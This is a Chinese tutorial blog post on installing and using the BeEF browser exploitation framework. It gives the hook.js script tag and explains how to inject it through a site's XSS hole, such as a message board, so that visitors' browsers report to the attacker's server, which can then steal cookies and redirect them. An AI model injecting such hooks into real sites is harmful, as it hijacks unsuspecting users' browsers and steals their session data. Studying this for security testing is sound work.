XSS攻击(5), beef-xss 平台

beef-xss 平台

这是一个利用XSS注入木马来监听和控制用户浏览器的工具.
新版的kali中可能没有内置这个工具了.

一, 安装

sudo apt install beef-xss

安装过程中需要设置登录密码, 默认账户:beef.

后面也可以通过配置文件修改账户和密码:

/usr/share/beef-xss/config.yaml

安装成功后会给出一个url, 用浏览器访问beef登录页面:

http://127.0.0.1:3000/ui/panel

默认任何ip都可以访问beef平台页面. 所以也可以使用远程访问:
192.168.112.201是beef安装所在的主机.

http://192.168.112.201:3000/ui/panel
Log:
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

这里显示了平台主页地址, 以及Hook木马的标签, 这个标签用于注入网站:
<script src="http://127.0.0.1:3000/hook.js"></script>

二, 测试demo页面

beef自带了两个测试页面, 这俩个页面是已经注入过的带有木马的页面:

http://192.168.112.201:3000/demos/basic.html
http://192.168.112.201:3000/demos/butcher/index.html

打开木马测试页面后, 浏览器就处于被控制状态, 可以回到beef平台中进一步操作.

三, 使用beef平台

进入beef平台主页面并登录.

左侧是被控制主机的目录, 右侧显示具体的操作:
Current Browser 界面显示用户的浏览器信息.
Details界面的内容包括 时间, 浏览器版本, cookie, 操作系统版本, cpu/gpu版本等.
Commands界面控制用户的浏览器执行各种命令.

1. 命令颜色:
绿色: 命令模块可以在目标浏览器上运行,且用户不会感到任何异常
橙色: 命令模块可以在目标浏览器上运行,但是用户可能会感到异常(比如可能会有弹窗,提示,跳转 等)
灰色: 命令模块尚未针对此目标进行验证,即不知道能否可运行
红色: 命令模块不适用于此目标
2. 执行命令:

选择<Get Cookie>, 点击右下角的Execute按钮执行即可控制用户的浏览器获取cookie.
选择<Redirect Browser>, 控制用户的浏览器重定向到其他url.

3. 植入木马

测试过demo页面有效之后, 可以将木马植入到具有XXS漏洞的主机测试.

打开目标网站存在XSS漏洞的位置, 将木马注入提交. 比如注入到留言板中.

木马标签中的地址需要替换为beef控制平台所在的ip:
<script src="http://192.168.112.201:3000/hook.js"></script>

注入成功后, 所有来访问木马网站的用户浏览器将被beef平台记录和控制.

回到beef平台, 在左侧即可看到被控制的木马网站, 以及访问它的用户.
凡是访问木马网站的用户, 浏览器每隔1秒会向beef控制平台发送数据, 保持监视.

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值